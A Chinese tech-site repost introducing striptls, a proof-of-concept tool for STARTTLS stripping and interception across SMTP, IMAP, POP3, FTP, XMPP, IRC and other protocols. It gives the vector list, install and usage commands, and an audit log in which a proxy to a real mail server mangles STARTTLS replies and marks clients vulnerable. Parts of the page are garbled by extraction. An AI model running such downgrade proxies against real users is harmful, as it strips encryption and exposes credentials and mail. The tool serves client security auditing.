欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

工具推荐:striptls端口剥离攻击的POC实现

程序员文章站 2022-07-09 22:16:16
STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。 striptls是一款端口剥...

STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。

striptls是一款端口剥离攻击的POC实现

SMTP

SMTP.StripFromCapabilities - server response capability patch
SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code
SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
SMTP.StripWithTemporaryError
SMTP.StripWithError
SMTP.ProtocolDowngradeStripExtendedMode
SMTP.InjectCommand

POP3

POP3.StripFromCapabilities
POP3.StripWithError
POP3.UntrustedIntercept

IMAP

IMAP.StripFromCapabilities
IMAP.StripWithError
IMAP.UntrustedIntercept
IMAP.ProtocolDowngradeToV2

FTP

FTP.StripFromCapabilities
FTP.StripWithError
FTP.UntrustedIntercept

NNTP

NNTP.StripFromCapabilities
NNTP.StripWithError
NNTP.UntrustedIntercept

XMPP

XMPP.StripFromCapabilities
XMPP.StripInboundTLS
XMPP.UntrustedIntercept
ACAP (untested)
ACAP.StripFromCapabilities
ACAP.StripWithError
ACAP.UntrustedIntercept

IRC

IRC.StripFromCapabilities
IRC.StripWithError
IRC.UntrustedIntercept
IRC.StripWithNotRegistered
IRC.StripCAPWithNotregistered
IRC.StripWithSilentDrop

结果:

- [*] client: 127.0.0.1
-     [Vulnerable!] 
-     [Vulnerable!] 
-     [           ] 
-     [Vulnerable!] 
- [*] client: 192.168.139.1
-     [Vulnerable!] 
-     [Vulnerable!] 
-     [Vulnerable!]  striptls.untrustedintercept at 0x7f08319a6870> striptls.stripfromcapabilities at 0x7f08319a67a0> striptls.stripinboundtls at 0x7f08319a6808> striptls.stripwitherror at 0xffd4614c> striptls.stripfromcapabilities at 0xffd316bc> striptls.stripwithtemporaryerror at 0xffd4611c> striptls.stripwithinvalidresponsecode at 0xffd3138c>
实例:
#> python -m striptls --help    # from pip/setup.py#> python striptls --help       # from source / root folderUsage: striptls [options]

       example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25Options:
      -h, --help            show this help message and exit  -v, --verbose         make lots of noise [default]
      -l LISTEN, --listen=LISTENlisten ip:port [default: 0.0.0.0:]
      -r REMOTE, --remote=REMOTE
                            remote target ip:port to forward sessions to
      -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEMformat assumed [default: server.pem]
      -x VECTORS, --vectors=VECTORS
                            Comma separated list of vectors. Use 'ALL' (default)
                            to select all vectors. Available vectors:
                            FTP.StripFromCapabilities, FTP.StripWithError,
                            FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
                            IMAP.StripWithError, IMAP.UntrustedIntercept,
                            NNTP.StripFromCapabilities, NNTP.StripWithError,
                            NNTP.UntrustedIntercept, POP3.StripFromCapabilities,
                            POP3.StripWithError, POP3.UntrustedIntercept,
                            SMTP.ProtocolDowngradeStripExtendedMode,
                            SMTP.StripFromCapabilities, SMTP.StripWithError,
                            SMTP.StripWithInvalidResponseCode,
                            SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                            XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                            XMPP.UntrustedIntercept [default: ALL]
安装:

1.从pip安装

#> pip install striptls

2.从源安装

#> setup.py install
示例:
                  inbound                    outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
  smtp-client                   striptls                    remote/target

本地 smtp-client -> localhost:8825 (代理) -> mail.gmx.net:25

审计模式:

在特定的情况下遍历所有协议并且跟踪违反starttls协议的客户端。你可以选择按Ctrl + C来中止审核并打印结果。

#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO     -  ready.
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto:    XMPP): 
2016-02-02 22:11:56,276 - INFO     - ]), 110: set([, ]), 143: set([, , ]), 21: set([, , ]), 119: set([, , ]), 25: set([, , , , ])}>
2016-02-02 22:12:08,477 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO     -  client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG    - 
2016-02-02 22:12:09,759 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING  -  terminated.
2016-02-02 22:12:13,056 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO     -  client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG    - 
2016-02-02 22:12:14,197 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG    -  [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING  -  terminated.
2016-02-02 22:12:16,649 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO     -  client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG    - 
2016-02-02 22:12:17,760 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING  -  terminated.
2016-02-02 22:12:20,071 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO     -  client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG    - 
2016-02-02 22:12:21,181 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG    -  [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING  -  terminated.
2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO     -  -- audit results --
2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 
2016-02-02 22:12:23,666 - INFO     -     [           ] 
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] @b.com>@b.com>@b.com>

除了审计模式外还有从服务端剥离starttls、无效化starttls响应、不可行的ssl链接(对于客户端则是不在检验服务端的证书是否可信)以及XMPP的追踪审计的功能。

 

@b.com>
@b.com>@b.com>
 striptls.untrustedintercept at 0x7f08319a6870> striptls.stripfromcapabilities at 0x7f08319a67a0> striptls.stripinboundtls at 0x7f08319a6808> striptls.stripwitherror at 0xffd4614c> striptls.stripfromcapabilities at 0xffd316bc> striptls.stripwithtemporaryerror at 0xffd4611c> striptls.stripwithinvalidresponsecode at 0xffd3138c>